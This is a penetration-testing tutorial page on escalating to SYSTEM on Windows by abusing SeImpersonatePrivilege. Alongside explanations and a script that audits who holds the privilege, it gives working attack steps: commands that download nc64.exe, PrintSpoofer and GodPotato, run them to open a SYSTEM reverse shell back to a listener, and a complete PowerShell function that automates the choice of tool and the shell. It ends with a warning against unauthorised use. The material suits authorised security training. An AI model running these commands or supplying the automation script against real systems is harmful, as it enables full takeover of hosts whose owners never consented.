# 4 - SeImpersonatePrivilege Exploitation

#### Topics <a href="#topics" id="topics"></a>

> 1. Introduction to the Windows Shells
> 2. Windows Permissions
> 3. Reverse Shells in Windows
> 4. SeImpersonatePrivilege Exploitation
> 5. On Cross Compilation
> 6. Windows Services
> 7. Weak Service Permissions
> 8. Unquoted Service Path
> 9. DLL Hijacking
> 10. Always Install Elevated
> 11. Files with Sensitive Data
> 12. Windows Hashes
> 13. Stored Credentials and the Windows Vault
> 14. Scheduled Task
> 15. Critical Registry Paths
> 16. Useful Tools
> 17. AMSI Bypass

## **What is** [**SeImpersonatePrivilege**](https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/seimpersonateprivilege-secreateglobalprivilege)**?**

The `SeImpersonatePrivilege`, or "Impersonate a client after authentication," is a user right in Windows that allows a process running with that user's token to impersonate the security context of a client that has authenticated to it, for example over a named pipe or an RPC connection.

This privilege exists for client-server scenarios: a server process accepts a connection, impersonates the caller and then does work with the caller's access rights instead of its own. By default it is granted to Administrators and to the built-in service identities LOCAL SERVICE, NETWORK SERVICE and SERVICE, so in practice any account that runs a Windows service holds it, including IIS application pool identities and the MSSQL service account. That is why a foothold obtained through a web shell or a database service so often comes with this privilege.

### **Security Implications**

If an attacker has the `SeImpersonatePrivilege`, they can:

* Stand up their own server endpoint, typically a named pipe, and coerce a more privileged local service into connecting to it (the Print Spooler, or the RPCSS/DCOM activation machinery that the "Potato" family abuses).
* Impersonate the token of that connected client; the token these services present is SYSTEM, so the attacker can spawn a new process as SYSTEM.\
  This coerce-and-impersonate pattern makes `SeImpersonatePrivilege` a common target in privilege escalation attacks.

***

### **Checking for SeImpersonatePrivilege**

To verify whether the current user has this privilege, run the following:

```bash
whoami /priv
```

**Sample Output**

```bash
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
```

If `SeImpersonatePrivilege` appears in the list, the user can exploit it for privilege escalation using tools like **PrintSpoofer** or **GodPotato**. The `State` column does not matter for that: `Disabled` only means the privilege is not currently enabled in the token, and a process can enable it for itself with `AdjustTokenPrivileges`. What blocks exploitation is the privilege being absent from the list altogether.
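The same check as a script, as an added example that is not part of the original page: it reads `whoami /priv` in CSV form instead of scraping the table, and reports the privilege as exploitable whenever it is present, enabled or not. The function name is an arbitrary choice.

```powershell
# Added example, not part of the original page: report whether the current
# token carries SeImpersonatePrivilege and whether it is usable.
function Test-ImpersonationPrivilege {
    # /fo csv gives a parseable table instead of the fixed-width output above
    $privs = whoami /priv /fo csv | ConvertFrom-Csv
    $imp   = $privs | Where-Object { $_.'Privilege Name' -eq 'SeImpersonatePrivilege' }

    # 'Enabled', 'Disabled', or 'Absent' when the privilege is not in the token at all
    $state = if ($imp) { $imp.State } else { 'Absent' }

    [pscustomobject]@{
        User        = (whoami)
        Present     = [bool]$imp
        State       = $state
        # Presence is what matters: a Disabled privilege can be enabled by the
        # process itself (AdjustTokenPrivileges), so it is still exploitable.
        Exploitable = [bool]$imp
    }
}

Test-ImpersonationPrivilege | Format-List
```

Run it from the shell you landed in (a web shell, a service account prompt); `Exploitable = True` with `State = Disabled` is the case people wrongly give up on.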

***

### **Assigning SeImpersonatePrivilege**

If you want to assign the `SeImpersonatePrivilege` to a user (for a lab, or to reproduce a vulnerable service account):

1. Open the **Local Group Policy Editor** (`gpedit.msc`; `secpol.msc` opens the same **Security Settings** node directly):
   * Navigate to:\
     `Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment`.
   * Locate *"Impersonate a client after authentication."*
2. Right-click and select **Properties**, then click **Add User or Group**.

User rights are placed in the token at logon, so the user has to log off and on again (or the service has to be restarted) before `whoami /priv` shows the new right. On a domain-joined host a GPO setting for this right overrides the local policy.
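The reverse view, as an added example that is not part of the original page: instead of assigning the right, list which accounts currently hold it, which is what you want when auditing a host or checking that a lab change took effect. It exports the User Rights Assignment area with `secedit`, parses the `SeImpersonatePrivilege` line and resolves the SIDs to names. `secedit /export` needs an elevated prompt; the export path and the function name are arbitrary choices.

```powershell
# Added example, not part of the original page: list the accounts that hold
# "Impersonate a client after authentication" on this host.
function Get-ImpersonatePrivilegeHolders {
    param([string] $ExportPath = (Join-Path $env:TEMP 'user-rights.inf'))

    # Export only the User Rights Assignment area of the effective local policy
    secedit /export /cfg $ExportPath /areas USER_RIGHTS | Out-Null
    if (-not (Test-Path $ExportPath)) { throw 'secedit export failed; run from an elevated prompt' }

    # The export is UTF-16; the line of interest looks like
    #   SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20
    $line = Get-Content -Path $ExportPath -Encoding Unicode |
            Where-Object { $_ -match '^\s*SeImpersonatePrivilege\s*=' } |
            Select-Object -First 1
    Remove-Item -Path $ExportPath -Force

    if (-not $line) { return @() }   # the right is assigned to nobody

    $entries = ($line -split '=', 2)[1] -split ',' | ForEach-Object { $_.Trim() }
    foreach ($entry in $entries) {
        if (-not $entry.StartsWith('*')) { $entry; continue }   # already a name
        # A leading * marks a SID; translate it to DOMAIN\Name
        $sid = New-Object System.Security.Principal.SecurityIdentifier($entry.Substring(1))
        try   { $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $entry.Substring(1) }   # orphaned SID: report it as-is
    }
}

# Default on a workstation or member server: Administrators, LOCAL SERVICE,
# NETWORK SERVICE and SERVICE. Anything beyond that is worth a second look.
Get-ImpersonatePrivilegeHolders
```

Remember that `SERVICE` (S-1-5-6) is a logon SID added to the token of every process the Service Control Manager starts, so the default list already covers every service account on the box even though none of them is named explicitly.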

***

## **Privilege Escalation with SeImpersonatePrivilege**

### **Initial Setup**

1. **Start a Listener on the Attacker Machine**

   ```bash
   nc -lvnp 5555
   ```
2. **Download Netcat on the Victim Machine**\
   `iwr` (`Invoke-WebRequest`) writes the file into the current directory; the exploit commands below reference `nc64.exe` by absolute path, so note where it landed (the examples use `C:\Users\leonardo\Desktop`).

   ```powershell
   iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -Outfile nc64.exe
   ```

***

### **Exploiting with PrintSpoofer**

**PrintSpoofer** abuses the Print Spooler service, which runs as SYSTEM, rather than any misconfiguration: it coerces the spooler into connecting to a named pipe the attacker controls, impersonates the SYSTEM token the spooler presents, and launches the supplied command with it. It therefore requires the **Spooler** service to be running; since PrintNightmare many hardened hosts keep it disabled, in which case fall back to GodPotato below.

1. **Download the Exploit**

   ```powershell
   iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe
   ```
2. **Execute the Exploit**\
   Run the following to have the spooler's SYSTEM token launch the reverse shell; adjust the path to `nc64.exe`, the listener address and the port to your setup. If you do not need a reverse shell, `-i` instead of `-c` gives an interactive SYSTEM prompt in the current console:

   ```powershell
   PrintSpoofer64.exe -c "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
   ```

***

### **Exploiting with GodPotato**

**GodPotato** abuses the way the RPCSS service handles DCOM activation, rather than a misconfiguration, and obtains a SYSTEM token from it. It does not depend on the Print Spooler, which makes it the usual choice when that service is stopped. It is a .NET assembly, so you need the build that matches a .NET Framework runtime installed on the target.

1. **Identify .NET Framework Version**\
   List the installed .NET Framework versions from the registry. Look for the subkeys `v2.0.50727`, `v3.5` and `v4\Full`; each installed version carries an `Install` value of `1`. On Windows 10/11 and Server 2016 or later, .NET Framework 4.x is present by default, so the NET4 build is normally the one to use:

   ```powershell
   reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
   ```
2. **Download the Appropriate GodPotato Version**\
   Depending on the .NET version:
   * **.NET 2.0**:

     ```powershell
     iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe
     ```
   * **.NET 3.5**:

     ```powershell
     iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe" -Outfile GodPotato-NET35.exe
     ```
   * **.NET 4.0**:

     ```powershell
     iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe" -Outfile GodPotato-NET4.exe
     ```
3. **Execute the Exploit**\
   Use the build matching the runtime found in step 1 (the NET2 build is shown here) to escalate privileges and spawn a reverse shell:

   ```powershell
   .\GodPotato-NET2.exe -cmd "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
   ```
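The whole procedure, PrintSpoofer first and GodPotato as the fallback, as an added example that is not part of the original page or of either tool: it checks whether the Spooler service is running, picks the GodPotato build from the NDP registry keys when it is not, and launches the reverse shell from the Initial Setup with whichever tool applies. It assumes `nc64.exe`, `PrintSpoofer64.exe` and the `GodPotato-NET*.exe` builds have already been downloaded into `$ToolDir`, and that the listener is the `nc -lvnp 5555` from above; the function names are arbitrary.

```powershell
# Added example, not part of the original page: choose between PrintSpoofer and
# GodPotato on the target and launch the reverse shell with whichever applies.

function Get-GodPotatoBuild {
    # Each installed .NET Framework version has Install=1 under its NDP subkey.
    # Checked newest first: NET4 is the right build on any modern host, NET35
    # and NET2 are fallbacks for old servers.
    $ndp = 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP'
    $candidates = [ordered]@{ 'v4\Full' = 'NET4'; 'v3.5' = 'NET35'; 'v2.0.50727' = 'NET2' }
    foreach ($sub in $candidates.Keys) {
        $props = Get-ItemProperty -Path (Join-Path $ndp $sub) -ErrorAction SilentlyContinue
        if ($props -and $props.Install -eq 1) { return $candidates[$sub] }
    }
    return $null
}

function Invoke-ImpersonationEscalation {
    param(
        [Parameter(Mandatory)] [string] $ListenerHost,
        [Parameter(Mandatory)] [int]    $ListenerPort,
        [string] $ToolDir = (Get-Location).Path   # assumption: tools staged here
    )
    $nc      = Join-Path $ToolDir 'nc64.exe'
    $payload = "$nc $ListenerHost $ListenerPort -e cmd"

    # PrintSpoofer coerces the Print Spooler, so that service must be running.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if ($spooler -and $spooler.Status -eq 'Running') {
        Write-Host "[*] Spooler is running, using PrintSpoofer"
        & (Join-Path $ToolDir 'PrintSpoofer64.exe') -c $payload
        return
    }

    # Spooler stopped or disabled (common since PrintNightmare): use GodPotato,
    # which goes through RPCSS/DCOM instead and only needs a .NET runtime.
    $build = Get-GodPotatoBuild
    if (-not $build) { throw 'No .NET Framework 2.0/3.5/4.x found; GodPotato cannot run here' }
    Write-Host "[*] Spooler not running, using GodPotato-$build"
    & (Join-Path $ToolDir "GodPotato-$build.exe") -cmd $payload
}

# Listener address and port are the ones used in the examples above.
Invoke-ImpersonationEscalation -ListenerHost '192.168.122.1' -ListenerPort 5555
```

Whichever branch runs, the shell that connects back to the listener is the child of a process holding a SYSTEM token; `whoami` in that shell should return `nt authority\system`, which is the check to do before anything else.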

***

## **Other Resources**

* [SeImpersonatePrivilege - Microsoft Doc](https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/seimpersonateprivilege-secreateglobalprivilege)
* [Juggernaut Security](https://juggernaut-sec.com/seimpersonateprivilege/)
* [FoxGlove Security](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
* [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)
* [GodPotato](https://github.com/BeichenDream/GodPotato)

{% hint style="danger" %}
**Disclaimer**

**❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!**❗
{% endhint %}
